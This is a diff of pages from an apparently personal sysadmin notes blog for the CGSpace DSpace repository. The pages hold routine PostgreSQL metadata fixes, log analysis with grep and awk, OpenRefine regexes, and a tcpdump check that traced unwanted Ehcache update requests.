<pre><code>dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;abstract&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)))
</code></pre><ul>
<li>And on others like <code>dc.language.iso</code>, <code>dc.relation.ispartofseries</code>, <code>dc.type</code>, <code>dc.title</code>, etc&hellip;</li>
<li>Also, to move fields from <code>dc.identifier.url</code> to <code>cg.identifier.url[en_US]</code> (because we don&rsquo;t use the Dublin Core one for some reason):</li>
</ul>
<pre><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
<pre tabindex="0"><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = &#39;en_US&#39; where resource_type_id = 2 AND metadata_field_id = 237;
UPDATE 15
</code></pre><ul>
<li>Set the text_lang of all <code>dc.identifier.uri</code> (Handle) fields to be NULL, just like default DSpace does:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like &#39;http://hdl.handle.net/10947/%&#39;;
UPDATE 4248
</code></pre><ul>
<li>Also update the text_lang of <code>dc.contributor.author</code> fields for metadata in these collections:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)));
UPDATE 4899
</code></pre><ul>
<li>Wow, I just wrote this baller regex facet to find duplicate authors:</li>
</ul>
<pre><code>isNotNull(value.match(/(CGIAR .+?)\|\|\1/))
<pre tabindex="0"><code>isNotNull(value.match(/(CGIAR .+?)\|\|\1/))
</code></pre><ul>
<li>This would be true if the authors were like <code>CGIAR System Management Office||CGIAR System Management Office</code>, which some of the CGIAR Library&rsquo;s were</li>
<li>Unfortunately when you fix these in OpenRefine and then submit the metadata to DSpace it doesn&rsquo;t detect any changes, so you have to edit them all manually via DSpace&rsquo;s &ldquo;Edit Item&rdquo;</li>
<li>Ooh! And an even more interesting regex would match <em>any</em> duplicated author:</li>
</ul>
<pre><code>isNotNull(value.match(/(.+?)\|\|\1/))
<pre tabindex="0"><code>isNotNull(value.match(/(.+?)\|\|\1/))
</code></pre><ul>
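<li>For a quick check outside OpenRefine, a roughly equivalent search over an exported CSV (hypothetical file name, and assuming a grep built with PCRE support) might be:</li>
</ul>
<pre><code>$ grep -P '([^|,]+)\|\|\1' /tmp/authors.csv
</code></pre><ul>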
<li>Which means it can also be used to find items with duplicate <code>dc.subject</code> fields&hellip;</li>
<li>Finally sent Peter the final dump of the CGIAR System Organization community so he can have a last look at it</li>
@ -365,12 +365,12 @@ UPDATE 4899
<li>Uptime Robot said CGSpace went down for 1 minute, not sure why</li>
<li>Looking in <code>dspace.log.2017-08-17</code> I see some weird errors that might be related?</li>
</ul>
<pre><code>2017-08-17 07:55:31,396 ERROR net.sf.ehcache.store.DiskStore @ cocoon-ehcacheCache: Could not read disk store element for key PK_G-aspect-cocoon://DRI/12/handle/10568/65885?pipelinehash=823411183535858997_T-Navigation-3368194896954203241. Error was invalid stream header: 00000000
<pre tabindex="0"><code>2017-08-17 07:55:31,396 ERROR net.sf.ehcache.store.DiskStore @ cocoon-ehcacheCache: Could not read disk store element for key PK_G-aspect-cocoon://DRI/12/handle/10568/65885?pipelinehash=823411183535858997_T-Navigation-3368194896954203241. Error was invalid stream header: 00000000
java.io.StreamCorruptedException: invalid stream header: 00000000
</code></pre><ul>
<li>Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:</li>
</ul>
<pre><code># grep -c &quot;ERROR net.sf.ehcache.store.DiskStore&quot; dspace.log.2017-08-*
<pre tabindex="0"><code># grep -c &#34;ERROR net.sf.ehcache.store.DiskStore&#34; dspace.log.2017-08-*
dspace.log.2017-08-01:0
dspace.log.2017-08-02:0
dspace.log.2017-08-03:0
@ -412,13 +412,13 @@ dspace.log.2017-08-17:584
<li>More information about authority framework: <a href="https://wiki.lyrasis.org/display/DSPACE/Authority+Control+of+Metadata+Values">https://wiki.lyrasis.org/display/DSPACE/Authority+Control+of+Metadata+Values</a></li>
<li>Wow, I&rsquo;m playing with the AGROVOC SPARQL endpoint using the <a href="https://github.com/tialaramex/sparql-query">sparql-query tool</a>:</li>
</ul>
<pre><code>$ ./sparql-query http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc
<pre tabindex="0"><code>$ ./sparql-query http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc
sparql$ PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt;
SELECT
?label
WHERE {
{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . }
FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) .
FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) .
} LIMIT 10;
┌───────────────────────┐
@ -452,7 +452,7 @@ WHERE {
<li>Since I cleared the XMLUI cache on 2017-08-17 there haven&rsquo;t been any more <code>ERROR net.sf.ehcache.store.DiskStore</code> errors</li>
<li>Look at the CGIAR Library to see if I can find the items that have been submitted since May:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;;
metadata_value_id | item_id | metadata_field_id | text_value | text_lang | place | authority | confidence
-------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
123117 | 5872 | 11 | 2017-06-28T13:05:18Z | | 1 | | -1
@ -465,7 +465,7 @@ WHERE {
<li>According to <code>dc.date.accessioned</code> (metadata field id 11) there have only been five items submitted since May</li>
<li>These are their handles:</li>
</ul>
<pre><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z');
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
handle
------------
10947/4658
@ -490,7 +490,7 @@ WHERE {
<li>I asked Sisay about this and hinted that he should go back and fix these things, but let&rsquo;s see what he says</li>
<li>Saw CGSpace go down briefly today and noticed SQL connection pool errors in the dspace log file:</li>
</ul>
<pre><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error
<pre tabindex="0"><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>Looking at the logs I see we have been having hundreds or thousands of these errors a few times per week in 2017-07 and almost every day in 2017-08</li>
@ -517,15 +517,15 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -32,7 +32,7 @@ Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two
Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -62,12 +62,12 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -114,7 +114,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<time datetime="2017-09-07T16:54:52+07:00">Thu Sep 07, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -130,7 +130,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<ul>
<li>Delete 58 blank metadata values from the CGSpace database:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 58
</code></pre><ul>
<li>I also ran it on DSpace Test because we&rsquo;ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate</li>
@ -145,7 +145,7 @@ DELETE 58
<li>There will need to be some metadata updates (though if I recall correctly it is only about seven records) for that as well; I had made some notes about it in <a href="/cgspace-notes/2017-07">2017-07</a>, but I&rsquo;ve asked for more clarification from Lili just in case</li>
<li>Looking at the DSpace logs to see if we&rsquo;ve had a change in the &ldquo;Cannot get a connection&rdquo; errors since last month when we adjusted the <code>db.maxconnections</code> parameter on CGSpace:</li>
</ul>
<pre><code># grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-09-*
<pre tabindex="0"><code># grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-09-*
dspace.log.2017-09-01:0
dspace.log.2017-09-02:0
dspace.log.2017-09-03:9
@ -174,14 +174,14 @@ dspace.log.2017-09-10:0
<li>The import process takes the same amount of time with and without the caching</li>
<li>Also, I captured TCP packets destined for port 80 and both imports only captured ONE packet (an update check from some component in Java):</li>
</ul>
<pre><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
<pre tabindex="0"><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and &#39;tcp[32:4] = 0x47455420&#39;
</code></pre><ul>
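<li>For reference, the hex in that capture filter is just the ASCII bytes for &ldquo;GET &rdquo;, which is easy to verify (assuming xxd is installed):</li>
</ul>
<pre><code>$ printf 'GET ' | xxd -p
47455420
</code></pre><ul>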
<li>Great TCP dump guide here: <a href="https://danielmiessler.com/study/tcpdump">https://danielmiessler.com/study/tcpdump</a></li>
<li>The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation</li>
<li>I sent a message to the mailing list to see if anyone knows more about this</li>
<li>In looking at the tcpdump results I notice that there is an update check to the ehcache server on <em>every</em> iteration of the ingest loop, for example:</li>
</ul>
<pre><code>09:39:36.008956 IP 192.168.8.124.50515 &gt; 157.189.192.67.http: Flags [P.], seq 1736833672:1736834103, ack 147469926, win 4120, options [nop,nop,TS val 1175113331 ecr 550028064], length 431: HTTP: GET /kit/reflector?kitID=ehcache.default&amp;pageID=update.properties&amp;id=2130706433&amp;os-name=Mac+OS+X&amp;jvm-name=Java+HotSpot%28TM%29+64-Bit+Server+VM&amp;jvm-version=1.8.0_144&amp;platform=x86_64&amp;tc-version=UNKNOWN&amp;tc-product=Ehcache+Core+1.7.2&amp;source=Ehcache+Core&amp;uptime-secs=0&amp;patch=UNKNOWN HTTP/1.1
<pre tabindex="0"><code>09:39:36.008956 IP 192.168.8.124.50515 &gt; 157.189.192.67.http: Flags [P.], seq 1736833672:1736834103, ack 147469926, win 4120, options [nop,nop,TS val 1175113331 ecr 550028064], length 431: HTTP: GET /kit/reflector?kitID=ehcache.default&amp;pageID=update.properties&amp;id=2130706433&amp;os-name=Mac+OS+X&amp;jvm-name=Java+HotSpot%28TM%29+64-Bit+Server+VM&amp;jvm-version=1.8.0_144&amp;platform=x86_64&amp;tc-version=UNKNOWN&amp;tc-product=Ehcache+Core+1.7.2&amp;source=Ehcache+Core&amp;uptime-secs=0&amp;patch=UNKNOWN HTTP/1.1
</code></pre><ul>
<li>Turns out this is a known issue and Ehcache has refused to make it opt-in: <a href="https://jira.terracotta.org/jira/browse/EHC-461">https://jira.terracotta.org/jira/browse/EHC-461</a></li>
<li>But we can disable it by adding an <code>updateCheck=&quot;false&quot;</code> attribute to the main <code>&lt;ehcache &gt;</code> tag in <code>dspace-services/src/main/resources/caching/ehcache-config.xml</code></li>
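<li>A minimal sketch of that one-line edit, assuming GNU sed and that the opening tag sits on a single line:</li>
</ul>
<pre><code>$ sed -i 's/&lt;ehcache /&lt;ehcache updateCheck=&quot;false&quot; /' dspace-services/src/main/resources/caching/ehcache-config.xml
</code></pre>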
@ -204,7 +204,7 @@ dspace.log.2017-09-10:0
<li>I wonder what was going on, and looking into the nginx logs I think maybe it&rsquo;s OAI&hellip;</li>
<li>Here is yesterday&rsquo;s top ten IP addresses making requests to <code>/oai</code>:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
1 213.136.89.78
1 66.249.66.90
1 66.249.66.92
@ -217,7 +217,7 @@ dspace.log.2017-09-10:0
</code></pre><ul>
<li>Compared to the previous day&rsquo;s logs it looks VERY high:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
1 207.46.13.39
1 66.249.66.93
2 66.249.66.91
@ -234,9 +234,9 @@ dspace.log.2017-09-10:0
</li>
<li>And this user agent has never been seen before today (or at least recently!):</li>
</ul>
<pre><code># grep -c &quot;API scraper&quot; /var/log/nginx/oai.log
<pre tabindex="0"><code># grep -c &#34;API scraper&#34; /var/log/nginx/oai.log
62088
# zgrep -c &quot;API scraper&quot; /var/log/nginx/oai.log.*.gz
# zgrep -c &#34;API scraper&#34; /var/log/nginx/oai.log.*.gz
/var/log/nginx/oai.log.10.gz:0
/var/log/nginx/oai.log.11.gz:0
/var/log/nginx/oai.log.12.gz:0
@ -270,19 +270,19 @@ dspace.log.2017-09-10:0
<li>Some of these heavy users are also using XMLUI, and their user agent isn&rsquo;t matched by the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/tomcat/server-tomcat7.xml.j2#L158">Tomcat Session Crawler valve</a>, so each request uses a different session</li>
<li>Yesterday alone the IP addresses using the <code>API scraper</code> user agent were responsible for 16,000 sessions in XMLUI:</li>
</ul>
<pre><code># grep -a -E &quot;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&quot; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -a -E &#34;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&#34; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
15924
</code></pre><ul>
<li>If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex</li>
<li>A search for &ldquo;API scraper&rdquo; user agent on Google returns a <code>robots.txt</code> with a comment that this is the Yewno bot: <a href="http://www.escholarship.org/robots.txt">http://www.escholarship.org/robots.txt</a></li>
<li>Also, in looking at the DSpace logs I noticed a warning from OAI that I should look into:</li>
</ul>
<pre><code>WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
<pre tabindex="0"><code>WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
</code></pre><ul>
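<li>A quick way to check whether that property is actually set anywhere in the local configuration (a sketch; the install path is assumed):</li>
</ul>
<pre><code>$ grep -r 'dspace.oai.url' ~/dspace/config/
</code></pre><ul>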
<li>Looking at the spreadsheet with deletions and corrections that CCAFS sent last week</li>
<li>It appears they want to delete a lot of metadata, which I&rsquo;m not sure they realize the implications of:</li>
</ul>
<pre><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;
<pre tabindex="0"><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;) group by text_value;
text_value | count
--------------------------+-------
FP4_ClimateModels | 6
@ -309,18 +309,18 @@ dspace.log.2017-09-10:0
<li>I sent CCAFS people an email to ask if they really want to remove these 200+ tags</li>
<li>She responded yes, so I&rsquo;ll at least need to do these deletes in PostgreSQL:</li>
</ul>
